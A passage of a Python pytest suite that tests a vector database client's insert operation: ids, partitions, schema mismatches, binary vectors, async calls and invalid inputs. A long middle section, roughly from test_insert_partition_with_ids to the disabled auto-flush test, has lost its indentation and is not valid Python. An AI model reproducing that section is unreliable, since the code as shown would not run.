******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
    scope="function",
    params=gen_simple_index()
)
def get_simple_index(self, request, connect):
    """Yield each simple index config, skipping ones unsupported on CPU."""
    # if str(connect._cmd("mode")) == "CPU":
    if request.param["index_type"] in index_cpu_not_support():
        pytest.skip("CPU not support index_type: ivf_sq8h")
    logging.getLogger().info(request.param)
    return request.param
@pytest.fixture(
    scope="function",
    params=gen_single_filter_fields()
)
def get_filter_field(self, request):
    # parametrises tests over every supported scalar (filter) field type
    yield request.param
@pytest.fixture(
    scope="function",
    params=gen_single_vector_fields()
)
def get_vector_field(self, request):
    # parametrises tests over every supported vector field type
    yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_empty_entity(self, connect, collection):
    """Inserting an empty entity list must raise ParamError."""
    with pytest.raises(ParamError) as exc:
        connect.insert(collection, [])
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_None(self, connect, collection):
    """Inserting None must raise an exception."""
    with pytest.raises(Exception) as exc:
        connect.insert(collection, None)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_collection_not_existed(self, connect):
    """Inserting into a non-existent collection must raise BaseException."""
    missing_collection = gen_unique_str(uid)
    with pytest.raises(BaseException) as exc:
        connect.insert(missing_collection, default_entities)
@pytest.mark.level(2)
def test_insert_without_connect(self, dis_connect, collection):
    """Inserting through a disconnected client must raise."""
    with pytest.raises(Exception) as exc:
        dis_connect.insert(collection, default_entities)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
    """
    target: test delete collection after insert entities
    method: insert entities and drop collection
    expected: has_collection false
    """
    ids = connect.insert(collection, default_entity)
    assert len(ids) == 1
    connect.drop_collection(collection)
    # idiom fix: truthiness assertion instead of '== False' (PEP 8 / E712)
    assert not connect.has_collection(collection)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_flush_drop_collection(self, connect, collection):
    """
    target: test drop collection after insert entities for a while
    method: insert entities, flush, and delete collection
    expected: has_collection false
    """
    ids = connect.insert(collection, default_entity)
    assert len(ids) == 1
    connect.flush([collection])
    connect.drop_collection(collection)
    # idiom fix: truthiness assertion instead of '== False' (PEP 8 / E712)
    assert not connect.has_collection(collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
    """Building an index after inserting entities must succeed."""
    inserted_ids = connect.insert(collection, default_entities)
    assert len(inserted_ids) == default_nb
    connect.flush([collection])
    connect.create_index(collection, field_name, get_simple_index)
    if get_simple_index["index_type"] != "FLAT":
        described = connect.describe_index(collection, "")
        create_target_index(get_simple_index, field_name)
        assert described == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
    """Inserting after the index is built must succeed and keep the index."""
    connect.create_index(collection, field_name, get_simple_index)
    inserted_ids = connect.insert(collection, default_entities)
    assert len(inserted_ids) == default_nb
    if get_simple_index["index_type"] != "FLAT":
        described = connect.describe_index(collection, "")
        create_target_index(get_simple_index, field_name)
        assert described == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_search(self, connect, collection):
    """Entities must be searchable after insert + flush + load."""
    connect.insert(collection, default_entities)
    connect.flush([collection])
    connect.load_collection(collection)
    results = connect.search(collection, default_single_query)
    assert len(results[0]) == default_top_k
def _test_insert_segment_row_count(self, connect, collection):
    """(Disabled) rows must split into two segments at the row limit."""
    nb = default_segment_row_limit + 1
    returned_ids = connect.insert(collection, gen_entities(nb))
    connect.flush([collection])
    assert len(returned_ids) == nb
    stats = connect.get_collection_stats(collection)
    segments = stats['partitions'][0]['segments']
    assert len(segments) == 2
    for segment in segments:
        assert segment['row_count'] in [default_segment_row_limit, 1]
@pytest.fixture(
    scope="function",
    params=[
        1,
        2000
    ],
)
def insert_count(self, request):
    # parametrises tests with a minimal (1) and a large (2000) batch size
    yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_ids(self, connect, id_collection, insert_count):
    """Custom ids are echoed back unchanged and the row count matches."""
    nb = insert_count
    custom_ids = list(range(nb))
    entities = gen_entities(nb)
    entities[0]["values"] = custom_ids
    returned_ids = connect.insert(id_collection, entities)
    connect.flush([id_collection])
    assert len(returned_ids) == nb
    assert returned_ids == custom_ids
    stats = connect.get_collection_stats(id_collection)
    assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
    """Duplicate custom ids are accepted and echoed back unchanged."""
    nb = insert_count
    duplicate_ids = [1] * nb
    entities = gen_entities(nb)
    entities[0]["values"] = duplicate_ids
    returned_ids = connect.insert(id_collection, entities)
    connect.flush([id_collection])
    assert len(returned_ids) == nb
    assert returned_ids == duplicate_ids
    stats = connect.get_collection_stats(id_collection)
    assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
    """Collections with varying field types accept inserts with custom ids."""
    nb = 5
    fields = {
        "fields": [gen_primary_field(), get_filter_field, get_vector_field],
        "auto_id": False
    }
    collection_name = gen_unique_str("test_collection")
    connect.create_collection(collection_name, fields)
    custom_ids = list(range(nb))
    entities = gen_entities_by_fields(fields["fields"], nb, default_dim, custom_ids)
    logging.getLogger().info(entities)
    returned_ids = connect.insert(collection_name, entities)
    assert returned_ids == custom_ids
    connect.flush([collection_name])
    stats = connect.get_collection_stats(collection_name)
    assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_not_match(self, connect, id_collection, insert_count):
    """
    target: test insert entities in an id collection without the id field
    method: create id_collection and insert entities missing the id field
    expected: exception raised by insert
    """
    nb = insert_count
    # fix: build the defective payload OUTSIDE the raises block so that a
    # failure in test setup (gen_entities/del) cannot be mistaken for the
    # expected insert error
    entities = gen_entities(nb)
    del entities[0]
    with pytest.raises(Exception) as e:
        connect.insert(id_collection, entities)
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
    """
    target: check the result of insert, with params ids and no ids
    method: insert twice, with customized ids first and then without ids
    expected: exception raised on the second insert
    """
    ids = [i for i in range(default_nb)]
    entities = copy.deepcopy(default_entities)
    entities[0]["values"] = ids
    connect.insert(id_collection, entities)
    # fix: mutate the payload OUTSIDE the raises block so only insert()
    # can supply the expected exception
    del entities[0]
    with pytest.raises(Exception) as e:
        connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_not_ids(self, connect, id_collection):
    """Inserting into an id-collection without the id field must raise."""
    payload = copy.deepcopy(default_entities)
    del payload[0]
    with pytest.raises(Exception) as exc:
        connect.insert(id_collection, payload)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
    """A batch insert with len(ids) != number of vectors must raise."""
    short_ids = list(range(1, default_nb))
    logging.getLogger().info(len(short_ids))
    payload = copy.deepcopy(default_entities)
    payload[0]["values"] = short_ids
    with pytest.raises(Exception) as exc:
        connect.insert(id_collection, payload)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, id_collection):
    """A single insert with len(ids) != number of vectors must raise."""
    mismatched_ids = list(range(1, default_nb))
    logging.getLogger().info(len(mismatched_ids))
    payload = copy.deepcopy(default_entity)
    payload[0]["values"] = mismatched_ids
    with pytest.raises(BaseException) as exc:
        connect.insert(id_collection, payload)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_partition(self, connect, collection):
    """Inserting into a named partition keeps the expected row count."""
    connect.create_partition(collection, default_tag)
    inserted_ids = connect.insert(collection, default_entities, partition_name=default_tag)
    assert len(inserted_ids) == default_nb
    assert connect.has_partition(collection, default_tag)
    connect.flush([collection])
    stats = connect.get_collection_stats(collection)
    assert stats[row_count] == default_nb
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_partition_with_ids(self, connect, id_collection):
'''
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
entities = gen_entities(default_nb)
entities[0]["values"] = ids
res_ids = connect.insert(id_collection, entities, partition_name=default_tag)
assert res_ids == ids
logging.getLogger().info(connect.describe_collection(id_collection))
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_default_partition(self, connect, collection):
'''
target: test insert entities into default partition
method: create partition and insert info collection without tag params
expected: the collection row count equals to nb
'''
ids = connect.insert(collection, default_entities, partition_name=default_partition_name)
assert len(ids) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_partition_not_existed(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_name param
expected: error raised
'''
tag = gen_unique_str()
with pytest.raises(Exception) as e:
connect.insert(collection, default_entities, partition_name=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_partition_repeatedly(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it repeatly, with the partition_name param
expected: the collection row count equals to nq
'''
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
res = connect.get_collection_stats(collection)
assert res[row_count] == 2 * default_nb
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_dim_not_matched(self, connect, collection):
'''
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
'''
vectors = gen_vectors(default_nb, int(default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
connect.insert(collection, insert_entities)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_field_name_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
'''
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_field_type_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
'''
tmp_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_field_value_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
'''
tmp_entity = update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_field_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
'''
tmp_entity = add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_field_vector_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
'''
tmp_entity = add_vector_field(default_nb, default_dim)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_field_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
'''
tmp_entity = remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_field_vector_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
'''
tmp_entity = remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_no_field_vector_value(self, connect, collection):
'''
target: test insert entities, with no vector field value
method: remove entity values of vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_no_field_vector_type(self, connect, collection):
'''
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_insert_with_no_field_vector_name(self, connect, collection):
'''
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
# todo fix timeout
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
'''
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it(idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
'''
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
res_ids = milvus.insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for th in threads:
th.join()
stats = milvus.get_collection_stats(collection)
assert stats[row_count] == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.level(2)
def _test_insert_disable_auto_flush(self, connect, collection):
'''
target: test insert entities, with disable autoflush
method: disable autoflush and insert, get entity
expected: the count is equal to 0
'''
delete_nums = 500
disable_flush(connect)
ids = connect.insert(collection, default_entities)
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
    # Insert tests for collections holding binary vectors; all index fixtures
    # are forced to the JACCARD metric, which is valid for binary data.
    @pytest.fixture(
        scope="function",
        params=gen_binary_index()
    )
    def get_binary_index(self, request):
        # Override whatever metric the generator produced with one that is
        # valid for binary vectors.
        request.param["metric_type"] = "JACCARD"
        return request.param

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_insert_binary_entities(self, connect, binary_collection):
        '''
        target: test insert entities in binary collection
        method: create collection and insert binary entities in it
        expected: the collection row count equals to nb
        '''
        ids = connect.insert(binary_collection, default_binary_entities)
        assert len(ids) == default_nb
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert stats[row_count] == default_nb

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_insert_binary_partition(self, connect, binary_collection):
        '''
        target: test insert entities and create partition tag
        method: create collection and insert binary entities in it, with the partition_name param
        expected: the collection row count equals to nb
        '''
        connect.create_partition(binary_collection, default_tag)
        ids = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
        assert len(ids) == default_nb
        assert connect.has_partition(binary_collection, default_tag)
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert stats[row_count] == default_nb

    def test_insert_binary_multi_times(self, connect, binary_collection):
        '''
        target: test insert entities multi times and final flush
        method: create collection and insert binary entity multi and final flush
        expected: the collection row count equals to nb
        '''
        # one row per insert call, flushed only once at the end
        for i in range(default_nb):
            ids = connect.insert(binary_collection, default_binary_entity)
            assert len(ids) == 1
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert stats[row_count] == default_nb

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
        '''
        target: test insert binary entities after build index
        method: build index and insert entities
        expected: no error raised
        '''
        connect.create_index(binary_collection, binary_field_name, get_binary_index)
        ids = connect.insert(binary_collection, default_binary_entities)
        assert len(ids) == default_nb
        connect.flush([binary_collection])
        index = connect.describe_index(binary_collection, "")
        create_target_index(get_binary_index, binary_field_name)
        assert index == get_binary_index

    @pytest.mark.timeout(ADD_TIMEOUT)
    def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
        '''
        target: test build index insert after vector
        method: insert vector and build index
        expected: no error raised
        '''
        ids = connect.insert(binary_collection, default_binary_entities)
        assert len(ids) == default_nb
        connect.flush([binary_collection])
        connect.create_index(binary_collection, binary_field_name, get_binary_index)
        index = connect.describe_index(binary_collection, "")
        create_target_index(get_binary_index, binary_field_name)
        assert index == get_binary_index

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_insert_binary_search(self, connect, binary_collection):
        '''
        target: test search vector after insert vector after a while
        method: insert vector, sleep, and search collection
        expected: no error raised
        '''
        ids = connect.insert(binary_collection, default_binary_entities)
        connect.flush([binary_collection])
        query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, 1,
                                        metric_type="JACCARD")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        logging.getLogger().debug(res)
        assert len(res[0]) == default_top_k
class TestInsertAsync:
    # Tests for insert() with _async=True: futures, callbacks, and timeouts.
    @pytest.fixture(scope="function", autouse=True)
    def skip_http_check(self, args):
        # async insert is not supported by the HTTP handler
        if args["handler"] == "HTTP":
            pytest.skip("skip in http mode")

    @pytest.fixture(
        scope="function",
        params=[
            1,
            1000
        ],
    )
    def insert_count(self, request):
        yield request.param

    def check_status(self, result):
        # callback used when the operation is expected to fail
        logging.getLogger().info("In callback check status")
        assert not result

    def check_result(self, result):
        # callback used when the operation is expected to succeed
        logging.getLogger().info("In callback check results")
        assert result

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_insert_async(self, connect, collection, insert_count):
        '''
        target: test async insert with different batch sizes
        method: insert with _async=True and wait on the returned future
        expected: length of ids equals the number of inserted entities
        '''
        nb = insert_count
        future = connect.insert(collection, gen_entities(nb), _async=True)
        ids = future.result()
        connect.flush([collection])
        assert len(ids) == nb

    @pytest.mark.level(2)
    def test_insert_async_false(self, connect, collection, insert_count):
        '''
        target: test insert with _async explicitly set to False
        method: insert with _async=False; the ids are returned directly
        expected: length of ids equals the number of inserted entities
        '''
        nb = insert_count
        ids = connect.insert(collection, gen_entities(nb), _async=False)
        connect.flush([collection])
        assert len(ids) == nb

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_insert_async_callback(self, connect, collection, insert_count):
        '''
        target: test async insert with a success callback
        method: insert with _async=True and _callback, then wait on the future
        expected: length of ids equals the number of inserted entities
        '''
        nb = insert_count
        future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
        future.done()
        ids = future.result()
        assert len(ids) == nb

    @pytest.mark.level(2)
    def test_insert_async_long(self, connect, collection):
        '''
        target: test async insert with a large batch
        method: insert 50000 entities asynchronously and wait for the result
        expected: length of ids equals nb and row count matches after flush
        '''
        nb = 50000
        future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
        ids = future.result()
        assert len(ids) == nb
        connect.flush([collection])
        stats = connect.get_collection_stats(collection)
        logging.getLogger().info(stats)
        assert stats[row_count] == nb

    @pytest.mark.level(2)
    def test_insert_async_callback_timeout(self, connect, collection):
        '''
        target: test async insert with an unreachably short timeout
        method: insert 100000 entities with timeout=1 second
        expected: waiting on the future raises an exception
        '''
        nb = 100000
        future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
        with pytest.raises(Exception) as e:
            result = future.result()

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_insert_async_invalid_params(self, connect):
        '''
        target: test async insert into a collection that does not exist
        method: insert into a freshly generated (never created) collection name
        expected: waiting on the future raises an exception
        '''
        collection_new = gen_unique_str()
        future = connect.insert(collection_new, default_entities, _async=True)
        future.done()
        with pytest.raises(Exception) as e:
            ids = future.result()

    # 1339
    def test_insert_async_invalid_params_raise_exception(self, connect, collection):
        '''
        target: test async insert with an empty entity list
        method: insert [] with _async=True
        expected: waiting on the future raises an exception
        '''
        entities = []
        future = connect.insert(collection, entities, _async=True)
        future.done()
        with pytest.raises(Exception) as e:
            future.result()
class TestInsertMultiCollections:
    """
    ******************************************************************
      The following cases are used to test `insert` function
      when several collections exist or operations are interleaved
    ******************************************************************
    """
    @pytest.fixture(
        scope="function",
        params=gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        logging.getLogger().info(request.param)
        # if str(connect._cmd("mode")) == "CPU":
        #     if request.param["index_type"] in index_cpu_not_support():
        #         pytest.skip("sq8h not support in CPU mode")
        return request.param

    def test_insert_entity_multi_collections(self, connect):
        '''
        target: test insert entities
        method: create 10 collections and insert entities into them in turn
        expected: row count matches default_nb in every collection
        '''
        collection_num = 10
        collection_list = []
        for i in range(collection_num):
            collection_name = gen_unique_str(uid)
            collection_list.append(collection_name)
            connect.create_collection(collection_name, default_fields)
            ids = connect.insert(collection_name, default_entities)
            connect.flush([collection_name])
            assert len(ids) == default_nb
            stats = connect.get_collection_stats(collection_name)
            assert stats[row_count] == default_nb
        for i in range(collection_num):
            connect.drop_collection(collection_list[i])

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_drop_collection_insert_entity_another(self, connect, collection):
        '''
        target: test insert vector to collection_1 after collection_2 deleted
        method: delete collection_2 and insert vector to collection_1
        expected: row count equals the length of entities inserted
        '''
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        connect.drop_collection(collection)
        ids = connect.insert(collection_name, default_entity)
        connect.flush([collection_name])
        assert len(ids) == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
        '''
        target: test insert vector to collection_2 after build index for collection_1
        method: build index and insert vector
        expected: status ok
        '''
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        connect.create_index(collection, field_name, get_simple_index)
        ids = connect.insert(collection_name, default_entity)
        assert len(ids) == 1
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection, "")
            create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
        connect.drop_collection(collection_name)

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
        '''
        target: test build index on collection_2 after inserting into collection_1
        method: insert vector and build index on another collection
        expected: status ok, row count of collection_1 equals 1
        '''
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        ids = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.create_index(collection_name, field_name, get_simple_index)
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection_name, "")
            create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
        '''
        target: test build index on collection_2 a while after inserting into collection_1
        method: insert vector, flush, then build index on another collection
        expected: status ok, row count of collection_1 equals 1
        '''
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        ids = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.create_index(collection_name, field_name, get_simple_index)
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    def test_search_entity_insert_entity_another(self, connect, collection):
        '''
        target: test insert entity to collection_1 after search collection_2
        method: search collection and insert entity
        expected: status ok
        '''
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        connect.load_collection(collection)
        res = connect.search(collection, default_single_query)
        assert len(res[0]) == 0
        connect.insert(collection_name, default_entity)
        connect.flush([collection_name])
        stats = connect.get_collection_stats(collection_name)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_insert_entity_search_entity_another(self, connect, collection):
        '''
        target: test search collection_2 after inserting into collection_1
        method: insert entity, then search the other (empty) collection
        expected: status ok, row count of collection_1 equals 1
        '''
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        ids = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.load_collection(collection_name)
        res = connect.search(collection_name, default_single_query)
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    def test_insert_entity_sleep_search_entity_another(self, connect, collection):
        '''
        target: test search collection_2 a while after inserting into collection_1
        method: insert entity, flush, then search the other (empty) collection
        expected: status ok, the empty collection returns no hits
        '''
        collection_name = gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        ids = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.load_collection(collection_name)
        res = connect.search(collection_name, default_single_query)
        assert len(res[0]) == 0

    @pytest.mark.timeout(ADD_TIMEOUT)
    def _test_insert_entity_during_release_collection(self, connect, collection):
        '''
        target: test insert entity during release
        method: release collection async, then do insert operation
        expected: insert ok
        '''
        for i in range(10):
            connect.insert(collection, default_entities)
        connect.flush([collection])
        connect.load_collection(collection)

        # BUGFIX: release() previously took no parameters while the Thread was
        # started with args=(collection,), which made the thread raise
        # TypeError instead of releasing the collection.
        def release(col):
            connect.release_collection(col)

        t = threading.Thread(target=release, args=(collection,))
        t.start()
        ids = connect.insert(collection, default_entities)
        assert len(ids) == default_nb
class TestInsertInvalid(object):
    """
    Test inserting entities with invalid inputs: collection names, partition
    names, field names/types/values, and customized ids.
    """
    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_collection_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_tag_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_field_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_field_type(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_field_int_value(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_ints()
    )
    def get_entity_id(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_vectors()
    )
    def get_field_vectors_value(self, request):
        yield request.param

    def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
        '''
        target: test insert, with using customize ids, which are not int64
        method: create collection and insert entities in it
        expected: raise an exception
        '''
        entity_id = get_entity_id
        ids = [entity_id for _ in range(default_nb)]
        with pytest.raises(Exception):
            connect.insert(id_collection, default_entities, ids)

    def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
        # inserting into an invalid collection name must fail
        collection_name = get_collection_name
        with pytest.raises(Exception):
            connect.insert(collection_name, default_entity)

    def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
        tag_name = get_tag_name
        connect.create_partition(collection, default_tag)
        # a None partition_name falls back to the default partition and must
        # succeed; any other invalid name must fail
        if tag_name is not None:
            with pytest.raises(Exception):
                connect.insert(collection, default_entity, partition_name=tag_name)
        else:
            connect.insert(collection, default_entity, partition_name=tag_name)

    def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
        # entity with a field renamed to an invalid name must be rejected
        tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)

    def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
        # entity with an invalid field type must be rejected
        field_type = get_field_type
        tmp_entity = update_field_type(copy.deepcopy(default_entity), 'float', field_type)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)

    def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
        # entity with an invalid value in the int64 field must be rejected
        field_value = get_field_int_value
        tmp_entity = update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)

    def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
        # entity with an invalid scalar inside the vector field must be rejected
        tmp_entity = copy.deepcopy(default_entity)
        src_vector = tmp_entity[-1]["values"]
        src_vector[0][1] = get_field_vectors_value
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
    """
    Test inserting binary entities with invalid inputs: field names, types,
    values, vectors, and customized ids.
    """
    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_collection_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_tag_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_field_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_field_type(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_field_int_value(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
